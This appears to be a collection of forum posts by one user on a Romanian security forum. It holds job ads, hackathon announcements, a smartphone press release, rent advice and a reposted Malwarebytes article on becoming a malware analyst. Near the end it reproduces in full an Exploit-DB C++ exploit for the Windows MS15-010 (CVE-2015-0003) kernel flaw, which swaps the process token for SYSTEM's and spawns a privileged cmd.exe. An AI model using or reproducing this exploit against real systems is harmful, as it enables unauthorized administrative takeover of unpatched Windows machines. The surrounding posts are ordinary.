Nytro

Cine le vrea, link direct, sa imi dea PM.

Da, el da, nu ne-a uitat.

Alex Ionescu? Nu cred ca a fost pe forum. Era ocupat sa scrie kernelul pentru ReactOS.

A auzit cineva de sickness? Dar de Alex Ionescu?

C++ Linux Developer Job We are actively looking for a C++ Linux Developer to work inside one of our clients’ team. As a Developer you will: - Develop and write the required code for specific applications - Collaborate with the other colleagues to ensure that the current suite of applications is meeting the clients’ needs - Document code consistently throughout the development process - Respond promptly and professionally to bug reports - Review and repair legacy code - Keep the project tasks status updated - Report status periodically to the supervisors - by request - Train specific clients on the use of the application if required by the company - Conduct training for new programming staff if required by the company - Project and develop server modules for Linux systems - Project and develop cross-platform modules (Linux, Mac, Windows) - Create applications for the automation of testing modules - Get involved in the general architecture of the system - Integrate new modules into existing products (Linux & Mac) - Fix bugs, refactor existing products Cine e interesat sa imi dea PM si il pun in legatura cu angajatorul.

Probabil au sursa. Stii tu, cand smecherul guvern SUA vine in Romania, e pupat in cur si i se ofera tot ce doreste.

Kaspersky rullz!

"De ce in jumatate din cadrele luate cu vorbitorii din acest material se fumeaza? Care e legatura cu hackingul, cu criminalitatea cibernetica? Par mai periculosi? " De ce reportajul "In cautarea celui mai periculos oras de pe Internet - Hackerville" este un esec? - WORLDIT

Pasionat de Programare ? Alatura-te primului Hackathon pe teme de securitate din Romania! Avira premiaza cele mai bune aplicatii de securitate in cadrul unui maraton de programare de 24 de ore, pe 27 si 28 iunie la Connect Hub, in Bucuresti. Ce vei dezvolta? Aplicatii care asigura navigarea in siguranta pe Internet astfel: •Protejeaza identitatea si confidentialitatea utilizatorului •Protejaza utilizatorul impotriva instalarii aplicatiilor nedorite (download installere, download pachete software care instaleaza si alte aplicatii pe langa aplicatia dorita) •Protejaza impotriva siteurilor de phishing / emailurilor de phishing •Asigura navigarea in siguranta a copiilor pe internet •Protejeaza impotriva aplicatiilor Facebook de tipul malware (care posteaza in numele tau, fara accordul tau, etc) •Protejeaza informatiile din telefon (poze, mesaje, parole, etc) •Monitorizeaza traficul de internet inregistrat pe telefonul mobil •Asigura Secure Mobile banking •Asigura criptarea comunicatiilor pe device-urile mobile Este acceptata orice aplicatie desktop, mobile, extensie de browser, aplicatie web, dezvoltata in orice limbaj de programare (C, C++, .Net, C#, Java, PHP, Javascript, Python), care ajuta la rezolvarea sau identificarea uneia din problemele de mai sus si nu numai. Orice alta solutie care ajuta utilizatorul de internet sa se simta in siguranta in momentul in care navigheaza, se joaca online, face tranzactii online, foloseste chatul online este de asemenea valida. Despre eveniment Evenimentul are o structura aparte: timp de 24 de ore, participantii vor sta in fata calculatoarelor, singuri sau in echipe de pana la 4 membri, pentru a dezvolta cele mai interesante aplicatii de securitate. Acestia vor avea la dispozitie cafea, fructe si pizza precum si spatii de relaxare, atmosfera fiind cat se poate de destinsa. Inregistrarea la eveniment este obligatorie si se face prin intermediul Eventbrite pana pe data de 25 iunie 2015.Participarea este gratuita si se face pe baza unei preselectii prealabile. Despre premii Premiile sunt oferite de Avira si sunt in valoare de 2000Euro pentru aplicatia castigatoare a locului 1, 700 euro pentru aplicatia clasata pe locul 2, si bean bags pentru fiecare membru al echipei de pe locul 3. Criterii de jurizare Eliminator: Aplicatia trebuie sa functioneze si sa I se poata face un demo la cerere. Originalitate – cat de inovatoare e ideea ta? A mai dezvoltat-o cineva? Utilizabilitate – cat de utila e aplicatia pe care ai dezvoltat-o? Cati oameni ar putea-o folosi? Scalabilitate – cat de scalabila la un numar mare de utilizatori e aplicatia ta? Impact – ce schimba aplicatia ta in modul in care utilizatorii percep securitatea pe internet? Popularitate – cate voturi ale celorlate echipe are aplicatia ta? Castigatoare va fi solutia care va intruni un numar maxim de puncte pentru toate criteriile de mai sus insumate. Program eveniment 27 iunie, 10:00 - 10:30 - Incepere eveniment si networking Pe data de 27 iunie, toti cei admisi la competitie sunt asteptati la Connect Hub, Bulevardul Dacia 99, la etajul 3. 27 Iunie, 10:30 - 11:00 – Intro si prezentare Organizatorii vor explica participantilor conceptul evenimentului, vor prezenta membrii juriului si mentorii si vor raspunde la intrebarile participantilor.? 27 Iunie, 11:00 – 12:00 – Sesiunile de mentoring Pentru o ora, bordul de jurati si mentori o sa ajute participantii sa isi defineasca ideile si sa isi formeze echipele. 27 iunie, 12:00 – Start Hacking Concurentii vor incepe maratonul de dezvoltare care va dura 24 de ore. 27 iunie, 18:00 – Prima sesiune de feedback Pe parcursul Securithon-ului, vor fi doua sesiuni de feedback, prima in ziua intai la orele 18:00 iar cea de-a doua in ziua a doua, la ora 9 dimineata. Pe parcursul acestor sesiuni, o selectie din membrii juriului si mentorii vor petrece pana la 10 minute cu fiecare echipa pentru a le oferi feedback legat de ceea ce au dezvoltat si pentru a le raspunde la intrebari. 28 iunie, 12:00 – Stop hacking Pe 28 iunie, duminica, dupa 24 de ore de dezvoltare, maratonul de programare se inchide, echipele vor finaliza dezvoltarea si vor pregati codul pentru a-l urca pe Github 28 iunie, 12:00-12:30 – Github time Toate echipele isi vor urca codul pe Github, pe un repository creat de organizatori. 12:30-13:00 – Open Demos Timp de 30 de minute, echipele au timp sa mearga la alte echipe, sa vorbeasca cu dezvoltatorii, sa vada demo-uri si sa voteze aplicatiile altor echipe, aplicand sticky notes in zona birourilor echipei pe care o voteaza. 13:00 – Start pitch-uri La orele 13:00 vor incepe pitch-urile, fiecare echipa va avea pana la 3 minute pentru a vorbi despre aplicatie juriului si celorlalti participanti, si 2 minute pentru intrebari. La finalul pitch-urilor, bordul de jurati si mentori va decide care sunt aplicatiile castigatoare. Inscrie-te acum, locurile sunt limitate! Event: http://www.eventbrite.com/e/securithon-sunt-asteptati-designeri-developeri-si-frontend-testeri-tickets-16694581944 Link: Avira Securithon

Indieni. Nimic avansat.

Fixed! Bravo!

Aka "Hai sa angajam studenti, ca de programatori nu avem bani"

@saber05 - Unul sau doua, depinde. @ManutaDeAur - Haide la noi si plateste firma.

Anuntul e si pe BestJobs daca nu vreti sa trimiteti CV-ul pe PM: IT Security Consultant (Penetration Tester) la S.C. KPMG ROMANIA SRL, BUCURESTI - BestJobs

Allview prezint? X2 Xtreme, noul s?u vârf de gam? smartphone Aurelian Mihai - 9 iun 2015 X2 Xtreme este un smartphone dual-SIM motorizat de chipsetul Helio X10 (CPU octa-core pe 64 bi?i, la 2GHz), ajutat cu 3GB memorie RAM. Dispozitivul beneficiaz? de tehnologia CorePilot 2.0 si folose?te sistemul de operare Android 5.1 Lollipop. Piesa de rezisten?? este îns? memoria intern? de 64GB care poate fi extinsa pana la 192GB prin adaugarea unui card microSD de maxim 128GB Allview X2 Xtreme „Continuam sa oferim consumatorilor produse adaptate cerintelor si asteptarilor tot mai diversificate, prin inovatie si cercetare constanta. Am pastrat totodata si traditia de a aduce in gama Soul un smartphone cu performante extreme. Avand in vedere tendintele si necesitatile utilizatorilor care isi doresc un smartphone cu specificatii la superlativ. Printre acestea de remarcat sunt: camera principala de 24 MP care prin intermediul unui algoritm de suprapunere a imaginilor poate oferi o rezolutie incredibila pe care insa o pastram sub forma de surpriza pana la aparitia primelor review-uri, mediul de stocare de pana la 192 GB care te ajuta in a captura filme la rezolutie de 4K, display-ul de 6” cu rezolutie Quad HD, procesorul Helio X10 si autonomia de peste 200 ore in convorbire in modul Extrem” a declarat Lucian Peticila, director general al companiei Visual Fan. Vârful gamei de telefoane Soul include sistem de deblocare pe baz? de amprent?, oferind un nivel sporit de protec?ie a datelor. Pe lâng? deblocarea ecranului, utilizatorul poate apela la folosirea amprentei pentru a cripta fi?iere. zoom in Allview X2 Xtreme ofer? dou? camere foto de 8MP ?i 24MP, camera principala dispunând de lentile cu 6 straturi(UV lens, focus lens, high precision lens, aperture, low dispersion lens) si protec?ie anti-zgârieturi cu strat de Safir. De remarcat este ?i blitz-ul LED cu dou? tonalit??i de lumin? - „cald?” si „rece”, conferind pozelor un aspect natural ?i palet? mai bogat? de culori. Telefonul poate filma la rezolu?ie 4K, respectiv captura imagini in timpul film?rii prin utilizarea butonului prezent pe rama telefonului. Al?turi de camera foto, cap de afi? pe lista specifica?iilor este ?i ecranul cu diagonal? 6? ?i rezolu?ie QHD (2560x1440). Utilizatorii pot alege oricare din temele smartphone-ului X2 Xtreme, respectiv functia Chameleon care adapteaz? interfa?a telefonului duplicând culorile din jurul t?u. Smartphone-ul este echipat cu o baterie de 3500 mAh care promite pana la 20 ore de func?ionare continua sau 350 ore in stand-by. X2. Telefonul Allview X2 Xtreme este disponibil începând de ast?zi pe baz? de precomand?, la pre?ul de 2199 LEI. Sursa: Allview prezint? X2 Xtreme, noul s?u vârf de gam? smartphone

Cred ca e ok sa completati ceva la intamplare daca nu aveti. Eu cred ca o sa aleaga persoane (cele 50) si in functie de Linkedin si de Github. Adica na, probabil daca sunt interesati si sa angajeze, vor sa aleaga persoane "ok". Sau cel putin sa ramana cu niste date de contact.

WHAT THE HACK?! 12 ORE, 20 DE CHALLENGE-URI, 2500EURO IN PREMII SI DOAR 50 DE PARTICIPANTI. CAND 21 Iunie 2015 Incepand cu 10am UNDE WELOVEDIGITAL Bulevardul Dacia, nr. 30, cl?direa Mecano Locurile sunt limitate INSCRIE-TE ACUM Link: http://whatthehack.net/

The job's daily activities include design, development, maintenance and integration of business applications. C# will be the usual programming language, Visual Studio - the development environment and Microsoft SQL Server - the data storage engine. Responsibilities: Building new systems with ASP.MVC , ASP.NET , SQL Server 2008/ 2012 , EntityFramework and Linq Developing new functionality on our existing software products Leading/mentoring IT staff and sharing knowledge through knowledge-sharing presentations Participating in a small, experienced, energetic development team. Requirements: Solid knowledge of C# and .NET Framework, OOP concepts, algorithms and data structures – minimum 4 years of experience Web development experience (ASP.MVC ,ASP.NET, Java script, AJAX, CSS, JSON, JQUERY); - minimum 4 years of experience Very good knowledge of T-SQL and relational database design; - minimum 4 years of experience Graduate of Computer Science/Cybernetics/Information Technology/Electronics College; Fluent in English; Ability and willingness to work as part of a team of developers; Learning oriented person. Additional advantage: Active Reports, SQL Reporting Services Java & Install Shield knowledge Active Directory knowledge Knowledge of WCF Web Services, WCF Data Services Pentru mai multe informatii sau aplicare, astept un PM.

Din pacate nu se poate lucra remote. Astept CV-urile persoanelor interesate. Proiectele garantez ca o sa va placa.

Cauta pe cineva si stati intr-un apartament cu doua camere. Ar veni 150 de euro de persoana intr-un apartament ok, in zona ok. Si intretinerea si cheltuielile s-ar imparti la 2. Ar trebui sa te descurci.

Chiria e costul principal, depinde in ce zona si cate camere. Garsoniere - 200-250 euro, 2 camere - 250-350 euro. Fata de viata cu parintii mai sunt: intretinerea, curentul, netul... Daca mai stai cu cineva, costurile se impart. Iar mancarea si bautura, iesirile in oras etc. depind de fiecare in parte.

So You Want To Be A Malware Analyst September 18, 2012 | BY Adam Kujawa In war, there are always two sides: the attackers and the defenders. A less focused on group is the researchers and developers. While soldiers are fighting a war on the front lines, scientists and engineers are researching and developing new weapons, defenses and tools; things that give their side an advantage. If one of these such creations is ever captured by the opposing forces, it is reverse engineered to understand exactly how it works, how it can be defended against and even how to re-purpose it. The same goes for war on the cyber front, malicious attackers and system administrators (Black and White Hats) are the soldiers, malware authors develop new and dangerous forms of malware and Malware Analysts reverse engineer these weapons to find out how to stop them. What is a Malware Analyst? A Malware Analyst is a highly specialized reverse-engineer, programmer and detective. They accomplish their task by using various tools and expert level knowledge to understand not only what a particular piece of malware can do but also how it does it. Becoming a Malware Analyst requires a large amount of focus and discipline as well as training and practice of the inner workings of computer systems, programming methodologies in multiple languages and a keen mind for solving puzzles and connecting the dots. You might consider becoming a Malware Analyst if you have a passion for computer security, enjoy solving puzzles and like the prospect of always learning new things. You might also enjoy it if you prefer a profession that always poses a challenge or if you look forward to working on new and interesting things. No day is ever the same as the previous, everyday is an opportunity to learn something new and fine-tune your skills. In addition to the personal satisfaction you would get from being a Malware Analyst, you would also become a samurai in the fight to make the cyber world a safer place. The type of person who would be perfect for becoming a Malware Analyst would be: A fast learner Able to derive meaning from nonsense A good puzzle solver Able to think outside of the box Willing to frequently use the scientific method Resourceful Prerequisites Prior to walking the path to become a Malware Analyst, a person should be familiar with: Operating System Concepts High Level & Low Level Programming (familiarity is fine, working knowledge not required at first) Fundamentals of networking How to use the internet to perform research Building the basics Being a Malware Analyst can take you many different places during your career and you can end up analyzing all types of malware, from normal application malware to exploits hidden in PDF files or malware found on smart phones. So where should you start when it comes to your training? You should master a few basics before trying anything too advanced: Learn Assembly Language In the hierarchy of programming languages, you have at the very top scripting languages like PERL or Python, followed by high and middle level languages like C++, C. Followed down by Assembly language, machine language and finally binary code which is read by the hardware. Most malware is written in a Middle Level language and once the code is completed, it is compiled all the way down so it can be read by the hardware and/or operating system. At this level, the code is not “Human Readable” or easily read by human eyes. In order for a Malware Analyst to be able to read the malware code, they will need to disassemble it. Unfortunately, the highest language derived from binary code is Assembly, which is the last level of human readable code. Therefore, it is imperative that a would-be Malware Analyst, also learn how to read and write Assembly code. Assembly language is low-level and therefore involves many more instructions than you would see in a higher-level program. For example, the code required to print something in the console in a higher-level languages is usually just one line and sometimes just one symbol. In Assembly, this simple procedure may require anywhere from 5 to 20 lines of code. Analysts Tip: Learning Assembly is easy if you already know a higher-level language, imagine what the operating system needs to do in order for a single function call to execute, this is what you will see in Assembly. By learning shortcuts to parsing Assembly, you will find what you are looking for much faster. Learn how to use the tools As a construction worker needs to know how to use a hammer and a mechanic needs to know how to use a wrench, a Malware Analyst needs to know to work their own set of unique and powerful tools. Some tools are easy to use and some are not, some have clear output and some dump you with lots of data that you need to be able to parse. The tools of a Malware Analyst are incredibly important and usually one of the first things learned. Here is a list of the types of tools required and some examples of them: Dissasembler – IDA Pro Debugger – OllyDbg, WinDbg System Monitor – Process Monitor, RegShot. Process Explorer Network Monitor – TCP View, Wireshark Packer Identifier – PEID Unpacking Tools – Qunpack. GUNPacker Binary Analysis Tools – PE Explorer, Malcode Analysts Pack Code Analysis Tools – LordPE, ImpRec Once you learn how the tools work and what you could do with them, your quest in analyzing malware will become easier and easier. Also, keep in mind that while you might originally learn how to use a specific suite of tools, new tools are being developed all the time that might be more helpful in both their design and function. Learn about malware Learning about malware might seem a bit redundant when you are training to become a Malware Analyst; however, it is a very important aspect of your training. Malware evolves and changes every year, it uses new methods to infect as well as operate and sometimes brings back old methods if they are applicable again. If you were writing a program to play Tic-Tac-Toe, you could try to write it from scratch, or you could see how other people have written it before and get an idea of what you need to do. The same applies for malware analysis; reading white papers and analysis reports about different types of malware will give you an idea of what you might be seeing while reversing. Process injection is a method that malware uses to hide its operations, it must go through a set of functions in order to perform this technique and it is important that you be able to identify it happening in the code based upon prior experience and knowledge about how malware works. Research, practice, knowledge and experience are key to being able to effectively analyze new malware and should be the staples of your Malware Analyst training. Helpful Links and Sources There are many different ways to learn about becoming a Malware Analyst; some people choose to go through courses taught online or in person, which can cost upwards of a few thousand dollars. Other people choose to learn as they go, picking up information where they can and learning from their own experience. Both are decent ways of learning about malware analysis but the cheap and easy way would be through doing online research and reading lots of books. Here is a list of my favorite sources for learning about malware analysis: Online Sources: Tuts4You.com Tutorials Sans.org and anything by Lenny Zeltser Google Searches for “Malware Analysis <specific topic>” Books: Malware Analyst’s Cookbook Rootkits: Subverting the Windows Kernel Practical Malware Analysis The IDA Pro Book Reversing: Secrets of Reverse Engineering Conclusion Whether it is to start a new career or just simple curiosity, learning about Malware Analysis can be a very challenging and rewarding path. It can test your patience, concentration and sometimes even your temper, but the payoff when you have been working on a file for hours and finally come across the key function or piece of data you were looking for, cannot be duplicated by anything else. The future holds a war between those who use malware and those who fight against it and as technology advances, so too does the methods in which malware authors write programs to exploit and control it. The next generation of malware fighters will require a more advanced knowledge than ever before they will be the cyber samurai. Sursa: https://blog.malwarebytes.org/intelligence/2012/09/so-you-want-to-be-a-malware-analyst/

IT Security Consultant (Penetration Tester/ Ethical Hacker) Job profile: Conducting technical security assessments and information security projects which require expertise in one or more of the following areas: Penetration Testing / Ethical Hacking, Vulnerability Assessments and IT Security Audits. Identifying and exploiting technical vulnerabilities in clients’ systems, assessing the business risks of the technical vulnerabilities and communicating these to the client. Performing security configuration analysis for various operating systems, especially Windows and Linux / UNIX. The successful candidate will have the ability to learn quickly and work with new technologies, tools and techniques. Some typical projects that you will work on (depending on your expertise) could be: Web application penetration testing: trying to find vulnerabilities in web applications (e.g. Internet Banking, eCommerce websites, web portals, etc.) and reporting them to clients. Trying to exploit these vulnerabilities to assess their impact on the business. Internal network penetration testing: simulating a malicious person who already has access to the internal network of the customer (e.g. a visitor, consultant, etc.). Starting only from a simple network port access you will have to gain access to sensitive information from the client's internal network, gain Domain Admin access or reach other flags. Mobile application penetration testing: trying to find vulnerabilities in mobile applications (Android, iOS, and Windows phone) and suggesting corrective measures to improve their security. You may also be involved in other types of technical project that will involve your imagination and out-of-the-box thinking, as well as giving demonstrations and presentations to clients. We encourage technical research and presentation of our results to local and international hacking conferences. Specific requirements Since IT Security is a multidisciplinary field, we are looking for a person who has a broader understanding of technical concepts from one or more of the following areas: web applications, system administration, networking, software development. We expect you to be familiar with OWASP Top 10, HTTP protocol, SSL, SQL, JavaScript, buffer overflow, TCP/IP, DNS, wireshark, nmap, Linux shell commands, Kali and others. You must also be able to express your findings in very good technical and business English (oral and written). Further requirements: - Bachelor’s degree in an IT related field. - Hands-on experience in at least one of the following: security testing, web application development/testing, system administration, networking, software development. - Ability to work effectively either individually or as a member of a multi-skilled team. - Professional discipline, accuracy, reliability and excellent analytical skills. - Strong interpersonal skills, team spirit, resilience, flexibility, adaptability and self-motivation. Certifications such as OSCP, OSCE, CEH, LPT, CCNA, MCSE will be considered an advantage. Our Offer A competitive salary and benefits package. The chance to develop a rewarding professional path and work on challenging assignments. Support for professional qualifications and personal development through a strong mentoring program. Work in a friendly team of security professionals who enjoy sharing their experience with colleagues. The opportunity to participate in a wide variety of technical projects and client environments. Flexible working program. Nota: Daca sunteti interesati, astept CV-ul vostru in PM.

[h=1]Microsoft Windows - Local Privilege Escalation (MS15-010)[/h] // ex.cpp /* Windows XP/2K3/VISTA/2K8/7 WM_SYSTIMER Kernel EoP CVE-2015-0003 March 2015 (Public Release: May 24, 2015) Tested on: x86: Win 7 SP1 | Win 2k3 SP2 | Win XP SP3 x64: Win 2k8 SP1 | Win 2k8 R2 SP1 Author: Skylake - skylake <at> mail <dot> com */ #include "ex.h" _ZwAllocateVirtualMemory ZwAllocateVirtualMemory; _PsLookupProcessByProcessId PsLookupProcessByProcessId; _PsReferencePrimaryToken PsReferencePrimaryToken; DWORD Pid; ATOM atom; BOOL KrnlMode, bSpawned; DWORD_PTR WINAPI pti() { #ifdef _M_X64 LPBYTE p = ( LPBYTE ) __readgsqword( 0x30 ); return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x78 ) ); #else LPBYTE p = ( LPBYTE ) __readfsdword( 0x18 ); return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x40 ) ); #endif } BOOL find_and_replace_member( PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue, DWORD_PTR dwNewValue, DWORD_PTR dwMaxSize ) { DWORD_PTR dwIndex, dwMask; #ifdef _M_X64 dwMask = ~0xf; #else dwMask = ~7; #endif // dwCurrentValue &= dwMask; for( dwIndex = 0; dwIndex < dwMaxSize; dwIndex++ ) { if( ( pdwStructure[dwIndex] & dwMask ) == dwCurrentValue ) { // pdwStructure[dwIndex] = dwNewValue; return TRUE; } } return FALSE; } BOOL WINAPI Init() { HMODULE hMod = NULL; PVOID Base = NULL; OSVERSIONINFO ov = { sizeof( OSVERSIONINFO ) }; PSYSTEM_MODULE_INFORMATION pm = NULL; BOOL RetVal = FALSE; __try { if( !GetVersionEx( &ov ) ) __leave; if( ov.dwMajorVersion == 5 && ov.dwMinorVersion > 0 ) { atom = 0xc039; } else if( ov.dwMajorVersion == 6 && ov.dwMinorVersion < 2 ) { atom = ( ov.dwMinorVersion == 1 ) ? 0xc03c : 0xc03a; } if( !atom ) __leave; _ZwQuerySystemInformation ZwQuerySystemInformation = ( _ZwQuerySystemInformation ) GetProcAddress( GetModuleHandle( TEXT( "ntdll.dll" ) ), "ZwQuerySystemInformation" ); if( !ZwQuerySystemInformation ) __leave; ZwAllocateVirtualMemory = ( _ZwAllocateVirtualMemory ) GetProcAddress( GetModuleHandle( TEXT( "ntdll.dll" ) ), "ZwAllocateVirtualMemory" ); if( !ZwAllocateVirtualMemory ) __leave; ULONG len; LONG status = ZwQuerySystemInformation( SystemModuleInformation, NULL, 0, &len ); if( !status ) __leave; pm = ( PSYSTEM_MODULE_INFORMATION ) LocalAlloc( LMEM_ZEROINIT, len ); if( !pm ) __leave; status = ZwQuerySystemInformation( SystemModuleInformation, pm, len, &len ); if( status ) __leave; CHAR szKrnl[MAX_PATH] = { 0 }, *t; for( ULONG i = 0; i < pm->Count; ++i ) { if( strstr( pm->Module[i].ImageName, "exe" ) ) { t = strstr( pm->Module[i].ImageName, "nt" ); if( t ) { strcpy_s( szKrnl, _countof( szKrnl ) - 1, t ); Base = pm->Module[i].Base; break; } } } hMod = LoadLibraryA( szKrnl ); if( !hMod || !Base ) __leave; PsLookupProcessByProcessId = ( _PsLookupProcessByProcessId ) GetProcAddress( hMod, "PsLookupProcessByProcessId" ); if( !PsLookupProcessByProcessId ) __leave; PsLookupProcessByProcessId = ( _PsLookupProcessByProcessId ) ( ( DWORD_PTR ) Base + ( ( DWORD_PTR ) PsLookupProcessByProcessId - ( DWORD_PTR ) hMod ) ); PsReferencePrimaryToken = ( _PsReferencePrimaryToken ) GetProcAddress( hMod, "PsReferencePrimaryToken" ); if( !PsReferencePrimaryToken ) __leave; PsReferencePrimaryToken = ( _PsReferencePrimaryToken ) ( ( DWORD_PTR ) Base + ( ( DWORD_PTR ) PsReferencePrimaryToken - ( DWORD_PTR ) hMod ) ); Pid = GetCurrentProcessId(); RetVal = TRUE; } __finally { if( pm ) LocalFree( pm ); if( hMod ) FreeLibrary( hMod ); } return RetVal; } LRESULT CALLBACK ShellCode( HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam ) { LPVOID pCurProcess = NULL; LPVOID pSystemInfo = NULL; PACCESS_TOKEN systemToken; PACCESS_TOKEN targetToken; PsLookupProcessByProcessId( ( HANDLE ) Pid, &pCurProcess ); PsLookupProcessByProcessId( ( HANDLE ) 4, &pSystemInfo ); targetToken = PsReferencePrimaryToken( pCurProcess ); systemToken = PsReferencePrimaryToken( pSystemInfo ); // find_and_replace_member( ( PDWORD_PTR ) pCurProcess, ( DWORD_PTR ) targetToken, ( DWORD_PTR ) systemToken, 0x200 ); KrnlMode = TRUE; return 0; } VOID WINAPI leave() { keybd_event( VK_ESCAPE, 0, 0, NULL ); keybd_event( VK_ESCAPE, 0, KEYEVENTF_KEYUP, NULL ); keybd_event( VK_LWIN, 0, KEYEVENTF_KEYUP, NULL ); } LRESULT CALLBACK WndProc( HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam ) { if( bSpawned ) { leave(); ExitProcess( 0 ); } switch( message ) { case WM_CREATE: SetTimer( hWnd, ID_TIMER, 1000 * 3, NULL ); FlashWindow( hWnd, TRUE ); keybd_event( VK_LWIN, 0, 0, NULL ); break; case WM_CLOSE: DestroyWindow( hWnd ); break; case WM_DESTROY: PostQuitMessage( 0 ); break; case WM_TIMER: KillTimer( hWnd, ID_TIMER ); leave(); DestroyWindow( hWnd ); break; default: return DefWindowProc( hWnd, message, wParam, lParam ); } return 0; } int APIENTRY _tWinMain( _In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPTSTR lpCmdLine, _In_ int nCmdShow ) { WNDCLASSEX wc = { sizeof( WNDCLASSEX ) }; HWND hWnd = NULL; MSG Msg = { 0 }; SIZE_T size = 0x1000; LPVOID addr = ( LPVOID ) 1; if( !Init() ) return 1; if( ZwAllocateVirtualMemory( ( HANDLE ) -1, &addr, 0, &size, MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE ) ) { // return 1; } DWORD_PTR p = pti(); if( !p ) return 1; #ifdef _M_X64 *( ( PDWORD_PTR ) 0x10 ) = p; *( ( LPBYTE ) 0x2a ) = 4; *( ( LPVOID* ) 0x90 ) = ( LPVOID ) ShellCode; *( ( PDWORD_PTR ) 0xa8 ) = 0x400; *( ( LPDWORD ) 0x404 ) = 1; *( ( PDWORD_PTR ) 0x408 ) = 0x800; *( ( LPWORD ) 0x410 ) = atom; *( ( LPBYTE ) 0x412 ) = 1; #else *( ( LPDWORD ) 0x08 ) = p; *( ( LPBYTE ) 0x16 ) = 4; *( ( LPVOID* ) 0x60 ) = ( LPVOID ) ShellCode; *( ( LPDWORD ) 0x6c ) = 0x400; *( ( LPDWORD ) 0x404 ) = 1; *( ( LPDWORD ) 0x408 ) = 0x800; *( ( LPWORD ) 0x40c ) = atom; *( ( LPBYTE ) 0x40e ) = 1; #endif wc.lpfnWndProc = WndProc; wc.hInstance = hInstance; wc.lpszClassName = TEXT( "Class" ); if( !RegisterClassEx( &wc ) ) return 1; hWnd = CreateWindowEx( WS_EX_CLIENTEDGE, TEXT( "Class" ), TEXT( "Window" ), WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, 200, 100, NULL, NULL, hInstance, NULL ); if( !hWnd ) return 1; ShowWindow( hWnd, SW_HIDE ); UpdateWindow( hWnd ); while( GetMessage( &Msg, NULL, 0, 0 ) ) { if ( Msg.message == WM_SYSTIMER ) // Borrowed from http://blog.beyondtrust.com/fuzzing-for-ms15-010 { if( !KrnlMode ) { Msg.hwnd = ( HWND ) NULL; } else { Msg.hwnd = hWnd; if( !bSpawned ) { ShellExecute( NULL, TEXT( "open" ), TEXT( "cmd.exe" ), NULL, NULL, SW_SHOW ); bSpawned = TRUE; } } } TranslateMessage( &Msg ); DispatchMessage( &Msg ); } return ( int ) Msg.wParam; } // EOF //ex.h #pragma once #include <windows.h> #include <stdio.h> #include <tchar.h> typedef NTSTATUS ( WINAPI *_ZwAllocateVirtualMemory ) ( _In_ HANDLE ProcessHandle, _Inout_ PVOID *BaseAddress, _In_ ULONG_PTR ZeroBits, _Inout_ PSIZE_T RegionSize, _In_ ULONG AllocationType, _In_ ULONG Protect ); typedef NTSTATUS ( WINAPI *_PsLookupProcessByProcessId ) ( _In_ HANDLE ProcessId, _Out_ PVOID *Process ); typedef PACCESS_TOKEN ( WINAPI *_PsReferencePrimaryToken ) ( _Inout_ PVOID Process ); typedef enum _SYSTEM_INFORMATION_CLASS { SystemBasicInformation = 0, SystemModuleInformation = 11 } SYSTEM_INFORMATION_CLASS; typedef NTSTATUS ( WINAPI *_ZwQuerySystemInformation ) ( _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass, _Inout_ PVOID SystemInformation, _In_ ULONG SystemInformationLength, _Out_opt_ PULONG ReturnLength ); typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY { HANDLE Section; PVOID MappedBase; PVOID Base; ULONG Size; ULONG Flags; USHORT LoadOrderIndex; USHORT InitOrderIndex; USHORT LoadCount; USHORT PathLength; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; typedef struct _SYSTEM_MODULE_INFORMATION { ULONG Count; SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; #define ID_TIMER 0x1 #define WM_SYSTIMER 0x118 // EOF Sursa: https://www.exploit-db.com/exploits/37098/

Nasol. Era o optiune de migrare de la vBulletin.